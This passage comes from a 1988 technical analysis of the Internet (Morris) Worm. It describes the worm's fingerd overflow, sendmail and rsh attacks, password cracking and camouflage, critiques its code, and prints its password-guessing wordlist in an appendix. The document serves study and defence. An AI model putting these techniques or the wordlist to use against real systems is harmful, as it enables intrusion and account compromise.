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Worm Program: A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due Technical Report CSD-TR-8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H. Sp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Computer Sciences Purdu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Lafayette, IN 47907-2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f@cs.purdue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vening of 2 November 1988, someone infected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worm program. That program exploited flaws i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systems based on BSD-derived versions of UNI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ws allowed the program to break into those machines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thus infecting those systems. This infection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to thousands of machines, and disrupted norm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net connectivity for many days. This repor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 of the components of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\320data and functions. It is based on study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ndependent reverse-compilations of the wor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disassembled to VAX assembly language. Almost no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given in the paper because of current concer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the ``immune system'' of Internet hos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should be detailed enough to allow the rea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behavior of the program. The paper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the security flaws exploited by the worm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some recommendations on how to eliminate or mitig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use. The report also includes an analysis of the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nd methods used by the author\(s\) of the worm, and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nclusions about his abilities and i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8 by Eugene H. Spafford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hereby granted to make copies of this work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solely for the purposes of instruction and research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pies must include a copy of this title page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Any other reproduction, publication, or use is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 without express written permission. November 29,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Worm Program: An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due Technical Report CSD-TR-8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H. Sp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Computer Sc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due University West Lafayette, IN 47907-2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f@cs.purdue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vening of 2 November 1988 the Internet came under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within. Sometime round 6 PM EST, a program was exec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hosts connected to the Internet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host, network, and user information, then brok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chines ???using flaws present in those systems'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reaking in, the program would replicate itsel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 would also attempt to infect other systems.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uld only infect Sun Microsystems Sun 3 systems, and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running variants of 4 BSD UNIX the program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, as did the confusion and consternation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 and users as they discovered that thei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infected. Although UNIX has long been known to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weaknesses \(cf. [Ritc79], [Gram84], and [Reid87]\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e breakins came as a great surprise to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. he program was mysterious to users at sites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. Unusual files were left in the usr/tmp direct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, and strange messages appeared in the log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utilities, such as the sendmail mail handling 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noticeable effect, however, was that systems beca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loaded with running processes as they became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. As time went on, some of these machines beca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that they were unable to continue any processing;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failed completely when their swap space or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were exhausted. By late Thursday night, personn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 at Berkeley and at Massachuse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Technology had ``captured'' copie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gan to analyze it. People at other sites also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the program and were developing methods of eradicat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fear was that the program was somehow tamper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sources in a way that could not be readily de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le a cure was being sought, system file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or information destroyed. By 5 AM EST Thursday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2 hours after the infection started on the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Systems Research Group at Berkeley had develop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set of steps to halt its spread. This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patch to the sendmail mail agent, and the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ame one or both of the C compiler and loader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. These suggestions were published in mailing l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usenet, although their spread was hampered b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ing from the Internet to attempt a ``quarantine.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bout 7 PM EST Thursday, another simple, effectiv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 the infection, without renaming system utilitie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at Purdue and also widely published. Softwar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osted by the Berkeley group at the same time to m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ws that enabled the program to invade systems.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was to analyze the code that caused the problems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8, the National Computer Security Center he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ly-convened workshop in Baltimore. The topic of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program and what it meant to the internet community.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t that meeting and why they were invited, and th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have not yet been mad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ne thing we know that was decided by those pre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was that they would not distribute copi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-engineered code to the general public. It was fel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xploited too many little-known techniqu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generally available would only provide other att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mework to build another such program. Although such a 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ell-intended, it can serve only as a delaying tactic.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7, I am aware of at least fiv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d code, and because of the widespread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ary, I am sure there are at least ten times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lready completed or in progress and the required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ols are too readily available within the comm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only a few groups have the capability to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. any system administrators, programm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are interested in how the program managed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n their systems and spread so quickly These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valid interest in seeing the code, especially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vendors. Their interest is not to duplicate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be sure that all the holes used by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plugged. Furthermore, examining the code m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 and vendors develop defenses agains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, despite the claims to the contrary by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ith copies of the reverse-engineered co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is intended to serve an interim role in this proces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etailed description of how the program works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source code that could be used to create a new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s such, this should be an aid to those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a better understanding of how the code worked, ye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 form that it cannot be used to create a new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onsiderable effort. Section 3 and Appendix C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observations about some of the flaws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ed by the program, and their fixes. A companion repor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ssued in a few weeks, will contain a history of the wor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through the Internet. This analysis is the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performed on three separate reverse-engine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code. Two of these versions are in C code, and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assembler. All three agree in all but the most min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 version of the code compiles to binary that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de, except for minor differences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. As such, I can state with some certainty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ly one version of the worm program, t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ign in intent. The worm did not write to the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transferring itself into a target system. It als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ansmit any information from infected systems to any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copies of the worm program itself. Since the Berke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s Research Group as already published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to the flaws exploited by the program, we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these specific attacks being used again. Many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issued appropriate patches. It now remains to con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vendors to issue fixes, and users to install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eems to be considerable variation in the names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escribed in this paper. I use the term worm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rus based on its behavior. Members of the press ha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virus, possibly because their experience to da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only with that form of security problem. This usag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d by quotes from computer managers and programm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with the terminology. For purposes of clar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, let me define the difference between these two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some citations to their origins:  worm is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by itself and can propagate a fully working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other machines. It is derived from the word tapeworm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sitic organism that lives inside a host and sap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o maintain itself.  virus is a piece of code tha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other programs, including operating systems.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dependently and it requires that its ``host''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o activate it. As such, it has a clear analog to bi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and those viruses are not considered alive in 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; instead, they invade host cells and corrupt them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produce  new viruses.  The program that was loo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was clearly a w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 Wor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a worm program that spreads itself from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chine was  apparently first described by John Brunner in 19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classic science fiction novel The Shockwave R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un75]  He called these programs tapeworms that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inside'' the computers  and spread themselve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In 1979-1981, researchers at Xerox PARC buil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ed with worm programs. They reported their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rticle in 1982 in Communications of the ACM.  [Shoc82]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 built at PARC were designed to travel from mach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do useful  work in a distributed environmen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used at that time to break into systems,  althoug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``get away'' during the tests. A few people seem to p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Internet Worm a virus because it was destru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lieve worms are non-destructive. Not  everyone agre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Worm was destructive, however. Since in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re sometimes difficult to judge, using those as a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n is clearly insufficient. As such, worm continu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choice to describe this kind of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Virus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(use of the word virus \(to my knowledge\)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infects a  computer was by David Gerrol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iction short stories about the G.O.D. machin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 were later combined and expanded to form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arlie Was One. [Gerr72] (A subplot in that book describ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d VIRUS created by an unethical scientist.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fected with VIRUS would randomly dial the phon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und another computer.  It  would then break into tha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ect it with a copy of VIRUS. This program would infil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software and slow the system down so mu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unusable  except to infect other machines\). The inven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lans to sell a program named VACCINE  that could cure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vent infection, but disaster occurred when nois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line caused VIRUS to mutate so VACCINE cea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.  The term computer virus was first used in a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y Fred Cohen at USC. [Cohe84]  He  defined the term to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urity problem that attaches itself to other code and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 something that produces viruses; to quote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: ``We define a computer `virus' as a  program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 other programs by modifying them to include a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ved copy of itself.'' He claimed the first computer viru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born'' on November 3, 1983, written by  himself for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nar cou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ested reader may also wish to consult [Denn88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wd85] for further discussion of the te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laws and Mis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Specific Proble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s of the Internet Worm exposed some specific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ws in standard services provided by BSD-deriv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. Specific patches for these flaws have been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ted in days since the worm program attacked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laws and patches are  discuss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. fingerd and ge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ger program is a utility that allows user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other users. It  is usually us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name or login name of a user, whether or not a us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 in, and possibly other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such as telephone numbers  where he or she can be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gerd program is intended to run as a daemon, o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to service remote requests using the finger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arr77]  The bug exploited to break fingerd involved over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the daemon used for  input. The standard C libra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routines that read input without checking for bound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involved. In particular, the gets call takes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ffer without doing any bounds  checking; this was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ed by the worm.  The gets routine is not the onl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law. The family of routines scanf/fscanf/sscanf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verrun buffers when decoding input unles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 specifies limits on the number of charac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. Incautious use of the sprintf routine can over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. Use of the strcat/strcpy call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ncat/strncpy routines  may also overflow their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experienced C programmers are aware of th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they  continue to use them. Worse, thei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some sense codified not only by historical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and the C language, but more formally in the forth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language standard  for C. The hazard with these cal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network server or privileged program using  th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be compromised by careful precalcu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input.  An important step in removing this ha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first to develop a set of replacement  calls tha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bounds on their program-supplied buffer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ll system servers and privileged applica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for unchecked uses of the original  calls,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n being replaced by the new bounded vers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dit  has  already been performed by the group at Berkele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ngerd and timed servers used the gets c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to fingerd have already been posted. Appendix C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 version of fingerd written specifically for th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used to replace the original version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alls to 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2. Sendmai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dmail program is a mailer designed to route mai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geneous internetwork.  [Allm83]  The program opera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odes, but the one of most interest is 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s a daemon process. In this mode,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listening'' on (a TCP  port \(#25\) for attempts to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using standard Internet protocols, principally SMT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Simple Mail Transfer Protocol\).  [Post82]  When such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cted, the daemon enters into  a dialog with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 to determine sender, recipient, delivery instru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ntents.  The bug exploited in sendmail had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provided by a debugging  option in the c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would issue the DEBUG command to sendmail and then spec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commands instead of a user address as the recipi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. Normally, this (is  not allowed, but it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bugging code to allow testers to verify that m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ing at a particular site without the need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resolution routines. The debug  option of sendm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 because of the complexity of configuring the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cal  conditions, and many vendors and site administ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debug option compiled in.  The sendmail program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 importance on most Berkeley-derived \(and other\)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because it handles the complex tasks of mail rou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y. Yet, despite  its importance and wide-spread use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 (know little about how it works. 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ten related about how system administrators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new device  drivers or otherwise modify the kern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, yet they will not willingly attempt to modify  send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figuration files.  It is little wonder, then, that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 (in sendmail that allow unexpected behavior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ws have been found and reported now that atten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ed on the program,  but it is not known for sure i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have been discovered and all the patches circulated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approach would be to dispose of sendmail and come (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mpler program to handle mail. Actually,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ification, developing a suite of cooperating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better approach, and more aligned with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. In effect,  sendmail is fundamentally flaw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anything related to function, (but because it is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and difficult to underst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rkeley Computer Systems Research Group has a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mail with  many bug fixes and fixes for security flaw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endmail is available for FTP from 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ucbarpa.berkeley.edu'' and will be present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ftp/pub/sendmail.tar.Z by the  end of November 1988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shipped with the DEBUG option disabl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However, this does not help system administrato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nable the DEBUG  option, although the research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eley believe they have fixed (all the security fla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in that facility. One approach that could be tak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uld be to have it  prompt the user for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er user \(root\) when the DEBUG command is give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password should never be compiled into the progra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would mean that the same password might be pre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ites and seldom changed.  For those sit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FTP or otherwise unable to obtain the new version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patches to sendmail are enclosed in Appendix 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Other Problem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worm exploited flaws in only two server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ehavior has served to  illustrate a few fundamental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not yet been widely addressed. In the intere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better security, some of these problems ar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(The interested reader is  directed to wo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m84] for a broader discussion of related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. Servers in gener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urity flaw not exploited by the worm, but now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, is that many system services have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owned by the same userid. Programs like  send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 service, and other facilities are often all ow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(non-user id. This  means that if it is possible to ab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ervices, it might be possible to abuse many. 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l with the general problem is have every daem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ystem run with a  separate userid. That way, the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for each subsystem could (be protected in  such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that subsystem could have write \(and perhaps read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files.  This is effectively an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 of least privilege. Although doing this  migh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 dozen user ids to the system, it is a small (co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, and is already sup ported in the UNIX paradigm.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have separate ids include sendmail, news, a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, ftp, uucp and Y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. Passwor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attack of the worm program involved attempts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asswords. It was  able to determine succes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password of each user was in a publicly read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an attacker to encrypt lists of possible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ompare  them against the actual password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through any system function. In effect, the  secu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s is provided in large part by the prohibitive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ying all combinations of letters. Unfortunately, a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aster, the cost of such attempts decreases. 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among multiple processors further reduces the tim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ypt a password. It (is currently feasibl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omputer to precalculate all probable passwords an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optical media. Although not \(currently\) portab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would allow someone with the appropriate resource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account for which they could read the password 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nsult (their database of pre-encrypted passwords.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of storage  media increases, this problem will on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vere.  A clear approach to reducing the risk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, and an approach that has already  been taken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s of UNIX, would be to have a (shadow) password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 passwords are saved in a file that is readable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dministrators, and a privileged  call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encryptions and comparisons with an appropriat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.5 to 1 second,  for instance\). This would prevent any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``fish'' for passwords. Additionally, a threshold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check for repeated password attempts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resulting  in some form of alarm being raised.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files should be used in combination with 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in place of such techniques, however, or on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ply replaced  by a different one; the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thods is stronger than either one alone.  Anothe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 the password mechanism would be to change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ets user passwords. The utility currently make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ensure that new passwords are nontrivial to gu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uld be strengthened in such a way that it would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oice of a word currently in the on-line dictionary o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ccount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igh-Level Description of the Wo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a high-level overview of how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unctions. The  description in this section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is familiar with UNIX and somewhat familia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acilities under UNIX. Section 5 describes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structures  in more detail.  The worm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arts: a main program, and a bootstrap or vector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described in Appendix B\). We will start our descri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at which a host is  about to be infected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 worm running on another machine has either succeed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shell on the new host and has connect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ing machine via a TCP  connection, or it ha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MTP port and is transmitting to the sendmai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ion proceeded as follows:  1\) A socket was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fecting machine for the vector program to connec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e.g., socket number 32341\). A challenge string was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a random number  \(e.g., 8712440\). A file name ba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structed using a random number \(e.g.,  14481910\).  2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 program was installed and executed using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:  2a\) Across a TCP connection to a shell, the wor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following commands  \(the two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cc'' were sent as a single line\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=/bin:/usr/bin:/usr/ucb  cd /usr/tmp  echo gorch49; sed '/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z/q' &gt; x14481910.c;echo gorch50  [text of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\320enclosed in Appendix B]  int zz;  cc (-o x144819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4481910.c;./x14481910 128.32.134.16 32341 8712440;  rm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4481910 x14481910.c;echo D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would wait for the string ``DONE'' to signa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program was  running.  2b\) Using the SMTP connec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ransmit \(the two lines beginning with ``cc''  wer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ngle line\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 mail from: &lt;/dev/null&gt;  rcpt to: &lt;"|sed -e '1,/^$/'d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in/sh ; exit 0"&gt;  data  cd /usr/tmp  cat &gt; x14481910.c &lt;&lt;'EOF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xt of vector program\320enclosed in Appendix III]  EOF  cc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4481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;  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x14481910 x14481910.c .   qu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ing worm would then wait for up to 2 minu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ated port for the vector to contact it.  3\)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n connected to the ``server,'' sent the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and  transferred three files: a Sun 3 binar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, a VAX version, and the source  code for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fter the files were copied, the running vector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\(via the execl call\) the shell with its input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onnected to the server  worm.  4\) The server worm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stream to the connected shel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=/bin:/usr/bin:/usr/ucb  rm -f sh  if [ -f sh ]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x14481910  else  P=sh  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for each binary file it had transferred \(just two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although the code is  written (to allow more\)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following form of command sequenc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 -o $P x14481910,sun3.o . /$P -p $$ x14481910,sun3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4481910,vax.o x14481910,l1.c  rm -f $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m would succeed only if the linked version of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to start execution. If  the server determi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was now infected, it closed the connection. Otherwis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ry the other binary file. After both binary files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, it would send over rm commands for the objec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way all evidence of the attempt at infection.  5\)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on the infected host proceeded to ``hide'' itsel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ing its argument  vector, unlinking the binar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nd killing its parent \(the $$ argument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\). It then read into memory each of the worm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encrypted each file  after reading it, and de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disk.  6\) Next, the new worm gather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network interfaces and hosts to which the  local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nnected. It built lists of these in memory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about canonical and alternate names and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athered some of this information  by making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ctl calls, and by running the netstat program with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It also read through various system files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names to add to its database.  7\) It randomized the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tructed, then attempted to infect some of those hosts.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connected networks, it created a list of possibl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attempted to infect those hosts if they ex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ype of host \(gateway or local network\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first tried to establish a connection on the telnet or r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to determine reachability before it attempte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 methods.  8\) The infection attempts proceed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ree routes: rsh, fingerd, or sendmail.  8a\) The attack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h was done by attempting to spawn a remote shell by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\(in order of trial\) /usr/ucb/rsh, /usr/bin/rs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in/rsh. If successful, the host was  infected as in steps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, above.  8b\) The attack via the finger daemon wa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ubtle. A connection was  established to the remote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daemon and then a specially constructed  string of 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was passed to the daemon, overflowing its input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parts of the stack. For standard 4 BS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n VAX computers, the overflow resulted in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frame for the main routine being  chang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ddress pointed into the buffer on the stac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hat were written into the stack at tha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:  pushl $68732f '/sh\\0'  pushl $6e69622f '/bin'  movl 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10  pushrl $0  pushrl $0  pushrl r10  pushrl $3  movl sp,a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mk $3b  That (is, the code executed when the mai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return was:  execve\("/bin/sh", 0, 0\)  On VAX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ulted in the worm connected to a remote shell via the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The worm then proceeded to infect the host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1 and 2a, (above.  On Suns, this simply resulted in a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nce the code was not in place to corrupt  a Sun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d in a similar fashion.  8c\) The worm then tried to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host by establishing a connection to the  SMTP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ling an (infection, as in step 2b, above.  No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were attempted. As soon as one method succeeded,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the internal list was marked as infected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were not attempted.  9\) Next, it entered a stat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five states. Each state (was run for a sh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, then the program looped back to step #7 \(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into other hosts via sendmail, finger, or rsh \)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f the five states were attempts to break into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on the local machine. The fifth state was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and occurred after all  attempts had been made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sswords. In the fifth state, the worm looped fore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infect hosts in its internal tables and marked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nfected. The four states  were:  9a\) The worm rea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etc/hosts.equiv files and /.rhosts files to find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quivalent hosts. These were marked in the internal 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. Next, the  worm read the /etc/passwd file into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. As it was doing this, it  also exa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orward file in each user home directory and includ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 names in its internal table of hosts to try. Oddly, i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imilarly check user .rhosts files.  9b\) The worm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eak each user password using simple choices. The w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the obvious case of no password. Then, it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and  GECOS field to try simple passwords.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user had an entry in the  password file lik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:abcedfghijklm:100:5:User, Name:/usr/account:/bin/sh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tried as potential passwords would b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account, User,  Name, user, name, and tnuocca. These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the account name, the  account name concat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elf, the first and last names of the user,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with leading capital letters turned to lower cas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 reversed. Experience described in [Gram8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on systems where users are naive about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, these choices may work for up to 30% of user pass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0 in this section describes what was done if a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hit'' was achieved.  9c\) The third stage in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trying to break the password of each user by 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ord present in an internal dictionary of words \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I\). This  dictionary of 432 words was tri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ccount in a random order, with  ``hits'' being hand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step 10, below.  9d\) The fourth stage wa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other attempts failed. For each word in th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dict/words, the worm would see if it was the passwor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In addition, if the word in the dictionary bega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case letter, the letter was converted to low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d was also tried against all the passwords.  10\)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was broken for any account, the worm would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into  remote machines where that user had accou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would scan the .forward and .rhosts files of the us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and identify the names of remote hosts that h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used by the target user. It then attempted two attack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a\) The worm would first attempt to create a remote shel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xec service. The  attempt would be made using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given in the .forward or .rhosts file  and the user'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This took advantage of the fact that users often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assword on their accounts on multiple machines.  10b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would do a rexec to the current host \(using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 and password\) and would try a rsh comm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host using the username taken  from the file. This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ucceed in those cases where the remote machine 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.equiv file or the user had a .rhosts file tha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execution  without a password.  If the remote she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either way, the attack would continue as in steps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,  above. No other use was made of the user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execution of the main loop, the worm woul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worms running on the same machine. To do this,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ttempt to connect to another worm on  a lo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termined TCP so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uch a connection succeeded, one worm would \(randomly\) se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quit variable to 1, causing that worm to exit after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partway  into the third stage of password crack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s part of the reason many systems had  multiple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even though a worm would check for other local worm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defer its self-destruction until significant effor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 to break local passwords.  One out of every seven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come immortal rather than check for other local  w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probably done to defeat any attempt to put a fak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n the TCP  port to kill existing worms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to the load of a machine once infected. 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send an UDP packet to the host ernie.berkeley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once every 15 infections, based on a rando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. The code to do this  was incorrect, however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as ever sent. Whether this was the intended ru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was actually some reason for the byte to be s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urrently known. However, the code is such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lized byte is the intended message.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 eventually intended to run some monitoring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ie \(after breaking into an account, no doubt\).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uld obtain the sending host number from the single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whether it was sent as a TCP or UDP packet. Howev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for such a program has been found and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nection was simply a feint to cast suspic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at Berkeley.  The worm would also fork itself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basis and kill its parent. This served two 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worm appeared to keep changing its process i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rocess accumulated excessive amounts of cpu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processes that have been running for a long  tim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iority downgraded by the scheduler. By forking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ould  regain normal scheduling priority. This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always work correctly, either, as we  locally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stances of the worm with over 600 seconds of accu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time.  If the worm ran for more than 12 hours, it would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host list of all entries flagged as  being immune or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. The way hosts were added to this list impli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worm might reinfect the same machines every 12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Tour of the Wo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brief, high-level description of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worm code.  The description cover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functionality of the program, but does not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auxiliary routines used nor does it describ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r algorithms involved. It  should, however,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 complete view of how the worm functio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Data Structur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had a few global data structures worth men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way it  handled some local data is of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1. Host li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constructed a linked list of host records.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an array of 12  character pointers to allow stor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2 host names/aliases. Each record also contained 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x long unsigned integers for host addresses, and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a flag field.  The only flag bits used in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0x01 \(host was a gateway\), 0x2 \(host has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\), 0x4 \(host cannot be infected \320 not reachabl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, wrong machine type\), and  0x8 \(host was ``equivalent'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 that it appeared in a context like .rhosts file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2. Gateway Li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constructed a simply array of gateway IP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se of the system netstat command. The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sed to infect directly connected networks. The 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s described in the explanation of scan_gate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_init,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3. Interfaces li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 of records was filled in with information abou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nterface active on  the current host. This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interface, the outgoing address, the netmask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host if the link was point-to-po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and the interface fla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4. Pw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ked list of records was built to hold user informatio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held the  account name, the encrypted passwo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irectory, the gecos field, and a link to the  nex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 field was also allocated for decrypted password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5. objec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intained an array of ``objects'' that he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composed the worm.  Rather than have the file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, the program read the files into thes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Each record in the list contained the suffi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\(e.g., ``sun3.o''\), the size of the file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contents of the file. The use of this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6. Wor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-dictionary of words was present in the worm to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guessing \(see  Appendix A\). The words we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, and every word was masked \(XOR\) with the  bi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80. Thus, the dictionary would not show up with an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rings program on the binary or objec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7. Embedded String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ext string used by the program, without exceptio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ed \(XOR\) with the bit  pattern 0x81. Every time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ferenced, it was referenced via a call to XS. The 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crypted the requested string in a static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returned a pointer to the  decrypted vers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ept any of the text strings in the program from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an invocation of strings. Simply clearing the high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\(e.g., XOR 0x80\) or displaying the  program binar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duce intelligible text. All references to X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 from the following text; realize that every str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ncrypted.  It is not evident how the strings we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this manner. The masked strings wer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 in the code, so some preprocessor or a modifi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must have been used. This represent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by the author of the worm, and suggests quite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uthor wanted to complicate or prevent th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nce it was dis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given here are arranged in alphabetic or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some routines are exactly as used by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Other names are based on the function of the rout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ames were chosen because the original routin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static and name information was not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. If the reader wishes to trace the functional \257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orm, begin with the descriptions of routines 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\(presented first for this reason\). By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can be \(arbitrarily\) grouped as follows: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: main, doit, crypt, h_addaddr, h_addname, h_addr2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_clean, h_name2host, if_init, loadobject, makemagic, netmask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ute, rt_init, supports_rsh, and supports_telnet. networ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attacks : attack_network, attack_user, crack_0, crack_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_2, crack_3, cracksome, ha, hg, hi, hl, hul, in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gateways, sendworm, try_fingerd, try_password, try_r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_sendmail, and waithit. camouflage: checkother, other_sl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_message, and xorb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. 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where the program started. The first thing it di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s argument vector to make it look like it was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Next, it set its resource limits so a failure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a core file. Then it loaded all the files nam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into the object structure in memory using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object. If the file was not one of the objects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would immediately call exit. Next, the code unlink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, the file named sh \(the worm itself\)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mp/.dumb \(apparently a remnant of some earlier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ossibly used as a restraint or lo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\320the file is not otherwise referenced\)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inished zeroing out the argument vector. Next,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ll if_init. If no interfaces were discovered b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the program would call exit. The program would the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urrent process group. If the process group wa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ent process id \(passed on the command line\)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its process group and send a KILL signal to its pa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all, the routine doit wa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. do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main worm code. First, a variable was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ime with a call to time, and the random number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itialized with the return value. Next, the routines h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 were invoked to infect some hosts. If one or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to infect any hosts, the routine ha was invoked. Nex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checkother was called to see if other worms we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. The routine send_message was also called to cast suspi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olks at Berkel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then entered an infinite loop: A call would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some followed by a call to other_sleep with a parame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Then cracksome would be called again. At this poi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ould fork itself, and the parent would exit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to continue. Next, the routines hg, ha, and hi would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o infect other hosts. If any one \(or combination\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failed to infect a new host, the routine h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to infect a local host. Thus, the code was ag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ways infecting at least one host each pass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. The logic here was faulty, however, because if all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hosts were infected, or a bad set of host numb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in ha, this code would call hl every time through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behavior was one of the reasons hosts became over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processes: every pass through the loop, each wor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be forced to infect another local host. Conside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worms could run on a host for some time before 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this could lead to an exponential growth of worms in a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Next, the routine other_sleep was ca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of 120. A check was then made to see if the worm ha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than 12 hours. If so, a call was made to h_c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 check was made of the pleasequit and nextw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set in other_sleep or checkother, and crack_2, respectively\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leasequit was nonzero, and nextw was greater than 1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would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. attack_net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as designed to infect random hosts on a sub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or each of the network interfaces, if checked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host was on a network to which the current ho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connected. If so, the routine immediately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class of the netmask \(e.g., Class A, Class B\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onstructed a list of likely network numbers.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was used to make good guesses at potential Class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All these constructed host numbers were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and the list was then randomized using permut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as Class B, the permutation was done to favor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hosts by doing two separate permutations\320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hosts in the output list were guaranteed to be chos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ozen \(low-numbered\) host numbers gener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20 entries in the permuted list were the only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. For each such IP address, its entry was retrie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list of hosts \(if it was in the list\). I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list and was marked as already infected or immu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gnored. Otherwise, a check was made to see if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the rsh command \(identifying it as existing an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D-derived networking services\) by calling supports_rsh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did support rsh, it was entered into the hosts list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resent, and a call to infect was made for that ho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ccessful infection occurred, the routine returned ear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TRUE \(1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4. attack_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as called after a user password was broken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correct code and may not work properly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 because a subroutine call was missing an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n Suns and VAXen, the code will work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argument was supplied as an extra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all, and the order of the arguments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 between the two routines. It was largely a coinc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worked. The routine attempted to open a .forw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he user's home directory, and then for each host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resent in that file, it called the hul routine. It then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with the .rhosts file, if present,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5. check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as to see if another worm was present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is a companion routine to other_sleep. Fir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value was checked: with a probability of 1 in 7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returned without ever doing anything\320these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immortal in the sense that they never again par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ss of thinning out multiple local worms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created a socket and tried to connect to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worm port''\320 23357. If the connection was successful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f challenges was made to verify that the other si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fellow worm. If so, a random value was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de, and a value was read from the socket. If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sent plus the value read was even, the local wor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easequit variable to 1, thus marking it for eventual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. The socket was then closed, and the worm ope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cket on the same port \(if it was not destine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\) and set other_fd to that socket to listen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. If any errors were encountered during this proced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involved set other_fd to -1 and it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This meant that any error caused the wor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rtal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6. crack_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first scanned the /etc/hosts.equiv file, add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 to the global list of hosts and setting the \257ag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them as equivalent.  Calls were made to name2h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ddrs. Next, a similar scan was made of the /.rhos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xact same calls. The code then called setpwent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etc/passwd file. A loop was performed as long as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read: Every 10th entry, a call was made to other_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imeout of 0. For each user, an attempt was made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.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ome directory of that user, and read the host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. These hostnames were also added to the host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equivalent. The encrypted password, home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cos field for each user was stored into the pwd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user entries were read, the endpwent rout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, and the cmode variable was set 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7. crack_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tried to break passwords. It looped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had been tried, or until the next group of 50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tested. In the loop: A call was made to other_slee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meter of zero each time the loop index modulo 10 wa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i.e., every 10 calls\). Repeated calls wer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_password with the values discussed earlier in \2474-8b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ccounts had been tried, the variable cmode was set to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8. crack_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used the mini-dictionary in an attempt to brea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\(see Appendix A\). The dictionary was first perm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using the permute\) call. Each word was decrypted in- pla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Ring its bytes with 0x80. The decrypted word was then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y_password routine for each user account. The word wa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ncrypted. A global index, named nextw was increm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ext dictionary entry. The nextw index is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it to determine if enough effort had been expend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could ``...go gently into that good night.''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ords were left, the variable cmode was set to 3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nteresting points to note in this routine: the reve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ds were not tried, although that would seem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thing to do, and all words were encrypted and de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rather than in a temporary buffer. This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than a copy while masking since no re-encryptio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done. As discussed in the next section, many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necessary effort such as this were presen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entire mini-dictionary was decrypted all a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word at a time. This would seem to less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of encrypting those words at all, sinc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would then be present in memory as plaintex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ll the words were tr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9. crack_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last password cracking routine. I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dict/words, and for each word found it called try_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each account. If the first letter of the word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, it was converted to lower case and retried.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were tried, the variable cmode was incremen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returned. In this routine, no calls to other_slee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persed, thus leading to processes that ran for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hecking for other worms on the local machine. Als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his routine did not try the reverse of words eith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0. crack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as a simple switch statement on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d cmode and it implemented the five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\2474-8 of this paper. State zero called crack_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ne called crack_1,  state two called crack_2, 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alled crack_3.  The default case simply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1. cry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took a key and a salt, then performed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encryption function on a block of zero bits.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routine was a pointer to a character string of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presenting the encoded password. The rout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optimized and differs considerably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version of the same routine. It call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: compkeys, mungE, des, and ipi. A routine, setupE,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esent and was associated with this code, but it wa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. It appears to duplicate the function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2. h_addadd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added alternate addresses to a hos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list if they were not already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3. h_add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added host aliases \(names\) to a given hos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entries were sup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4. h_addr2h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dress provided to the routine was checked agains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the global host list to see if it was already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, a pointer to that host entry was returned. If not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ameter flag was set, a new entry was initializ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address and a pointer to it wa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5. h_cle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traversed the host list and removed an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as infected or immune \(leaving hosts not yet tried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6. h_name2h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h_addr2host except the comparison was done by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li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7. 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tried to infect hosts on remote networks. Fir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to see if the gateways list had entries; if no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rt_init.  Next, it constructed a list of all IP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ateway hosts that responded to the try_telnet rout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host addresses was randomized by permute.  Then,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 the list so constructed, the address was mas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returned by netmaskfor and the result was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_network routine. If an attack was successful,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ed early with a return value of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8. h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attempted to infect gateway machines. I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rt_init to reinitialize the list of gateways, and th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teway it called the main infection routine, infect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way as an argument. As soon as one gatew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infected, the routine returned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9. h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tried to infect hosts whose entries in the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ere marked as equivalent.  The routine traversed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list looking for such entries and then calling inf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hosts. A successful infection returned early with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0. h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as intended to attack hosts on directly-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For each alternate address of the current ho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attack_network was called with an argument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logically and-ed with the value of netmask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A success caused the routine to return ear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value of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1. h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ttempted to attack a remote host via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It first checked to make sure that the host wa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ost and that it had not already been marked as in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t called getaddrs to be sure there was an addres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It examined the username for punctuation charac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f any were found. It then called other_sleep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of 1. Next, the code tried the attack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2474-10. Calls were made to sendworm if either attack suc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tablishing a shell on the remot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2. if_in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constructed the list of interfaces using io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. In summary, it obtained information about each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up and running, including the destination add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to-point links, and any netmask for that interfa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the me pointer to the first non-loopbac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and it entered all alternate addresses i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3. inf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main infection routine. First, the host arg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to make sure that it was not the current host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currently infected, and that it had not been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mmune. Next, a check was made to be sure that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st could be found by calling getaddrs.  If n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, the host was marked as immune and the routin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. Next, the routine called other_sleep with a timeout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at, it tried, in succession, calls to try_rs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_fingerd,  and try_sendmail.  If the calls to try_r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_finge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, the file descriptors established by those inv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assed as arguments to the sendworm call. I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infection attempts succeeded, infect returned ear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RUE. Otherwise, the routine returned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4. load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read an object file into the objects stru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The file was opened and the size found with a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routine fstat.  A buffer was malloc'd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and a call to read was made to read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buffer was encrypted with a call to xorbuf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into the objects array. The suffix o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e.g., sun3.o, l1.c, vax.o\) was saved in a fi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s was the size of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5. makemag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used the library random call to generate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use as a challenge number. Next, it tried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elnet port \(#23\) of the target host, us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address currently known for that host. If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as made, the library call getsockname was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anonical IP address of the current host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Next, up to 1024 attempts were made to establish a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, using port numbers generated by taking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number generator modulo 32767. If the conne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, the routine returned the port number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of the socket, the canonical IP addres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, and the challeng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6. netmask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stepped through the interfaces array and chec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ddress against those interfaces. If it fou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was reachable through a connected interface, the net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was the netmask associated with that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return was the default netmask based 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\(Class A, Class B, Class C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7. other_sle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checked a global variable named other_f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was less than zero, the routine simply called slee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d timeout argument, then returned.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aited on a select system call for up to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. If the timeout expired, the routine returned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lect return code indicated there was input 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_fd descriptor, it meant there was another wor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chine. A connection was established and an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magic'' numbers was made to verify identity. The local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rote a random number \(produced by random\)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via the socket. The reply was read and a check wa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response came from the localhost \(127.0.0.1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escriptor was closed. If the random value sent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was an odd number, the other_fd variable was set to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leasequit variable was set to 1. This me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worm would die when conditions were right \(cf. doit \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t would no longer attempt to contact other wor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achine. If the sum was even, the other worm was dest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8. perm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randomized the order of a list of objects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executing a loop once for each item in the list.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of the loop, the random number generator wa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o the number of items in the list. The item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by that value was swapped with the item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by the current loop value \(via a call to bcopy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9. rt_in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lized the list of gateways. It started by set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counter, ngateways,  to zero. Next, it invo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``/usr/ucb/netstat -r -n'' using a popen call.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ooped while output was received from the netstat command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as read. A call to other_sleep was made with a time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The input line was parsed into a destination and a gate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ateway was not a valid IP address, or if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back address \(127.0.0.1\), it was discarded. The valu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pared against all the gateway addresses already kn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were skipped. It was also compared against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interfaces \(local networks\), and discarde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. Otherwise, it was added to the list of gate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er incre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0. scan_gatew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 code called permute to randomize the gateway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t looped over each gateway or the first 20, whichev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A call was made to other_sleep with a timeout of zer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IP address was searched for in the host list; a new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llocated for the host if none currently existed. The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was set in the flags field of the host entry. A ca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library routine gethostbyaddr with the IP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way. The name, aliases and address fields we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list, if not already present. Then a call wa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ostbyname and alternate addresses were add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After this loop was executed, a second loop wa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 effectively the same thing as the first!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reason why this was done, unless it is a remnant of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or a stub for future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1. send_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made a call to random and 14 out of 15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without doing anything. In the 15th case, it ope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 socket to host ``ernie.berkeley.edu'' and then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 uninitialized byte using the sendto call. 